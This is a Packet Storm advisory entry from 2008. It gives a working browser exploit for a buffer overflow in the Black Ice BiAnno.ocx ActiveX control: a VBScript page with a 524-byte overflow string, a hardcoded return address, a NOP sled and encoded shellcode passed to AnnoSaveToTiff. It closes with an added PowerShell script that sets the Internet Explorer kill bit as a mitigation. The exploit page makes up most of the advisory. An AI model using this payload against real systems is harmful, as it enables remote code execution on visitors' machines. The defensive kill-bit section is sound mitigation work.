blackicebianno2-overflow.txt

2008-06-11T00:00:00
ID PACKETSTORM:67155
Type packetstorm
Reporter shinnai
Modified 2008-06-11T00:00:00

Description

------------------------------------------------------------------------------  
Black Ice Software Annotation Plugin (BiAnno.ocx) Remote Buffer Overflow (2)  
url: http://www.blackice.com  
  
File : BiAnno.ocx  
Ver. : 10.9.5.0  
CLSID: {B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A}  
  
Mark.: RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: False  
  
Author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
This was written for educational purposes. Use it at your own risk.  
The author will not be responsible for any damage.  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
  
In memory of rgod  
------------------------------------------------------------------------------  
<object classid='clsid:B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A' id='test'></object>  
  
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>  
  
<script language='vbscript'>  
Sub tryMe  
buff = String(524, "A")  
  
get_EIP = unescape("%EB%BA%3F%7E") 'call ESP from user32.dll  
  
nop = String(9, unescape("%90"))  
  
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _  
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _  
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _  
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _  
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _  
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _  
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _  
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _  
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _  
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _  
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _  
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _  
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _  
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _  
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _  
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _  
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _  
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _  
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _  
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _  
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _  
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")  
  
egg = buff & get_EIP & get_EIP & nop & shellcode & nop  
  
'As you can see, I use get_EIP twice. That's because the first one is useful  
'to call our shellcode; the second one is just to bypass an exception.  
  
test.AnnoSaveToTiff egg, 1  
End Sub  
</script>  
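Since the control is marked Safe for Scripting and does not implement IObjectSafety, the practical mitigation on affected hosts is to set the Internet Explorer kill bit for its CLSID so a web page can no longer instantiate it. The following PowerShell is an added example, not part of shinnai's advisory; the CLSID is the one published above, and the registry path and the 0x400 Compatibility Flags value are Microsoft's documented kill-bit mechanism.

```powershell
# Added example (not part of the advisory): set the IE kill bit for BiAnno.ocx.
# CLSID taken from the advisory; the ActiveX Compatibility key and the 0x400
# "Compatibility Flags" bit are Microsoft's documented kill-bit mechanism.
$clsid   = '{B27DC3CE-FF81-4DCF-9B80-0E69D61BED2A}'
$killBit = 0x400

# 32-bit IE on 64-bit Windows reads the Wow6432Node copy, so cover both if present.
$bases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
) | Where-Object { Test-Path $_ }

foreach ($base in $bases) {
    $key = Join-Path $base $clsid

    # Create the per-CLSID key if it does not exist yet.
    if (-not (Test-Path $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve any flags already set and OR in the kill bit.
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' `
        -Value ($current -bor $killBit) -Type DWord

    # Verify: the kill bit must be present after the write.
    $check = (Get-ItemProperty -Path $key -Name 'Compatibility Flags').'Compatibility Flags'
    if (($check -band $killBit) -eq $killBit) {
        Write-Output "Kill bit set under $key (Compatibility Flags = 0x$($check.ToString('X')))"
    } else {
        Write-Error "Failed to set kill bit under $key"
    }
}
```

Run from an elevated prompt; Internet Explorer honours the change on its next start, and the control remains usable by local applications that load it outside the browser.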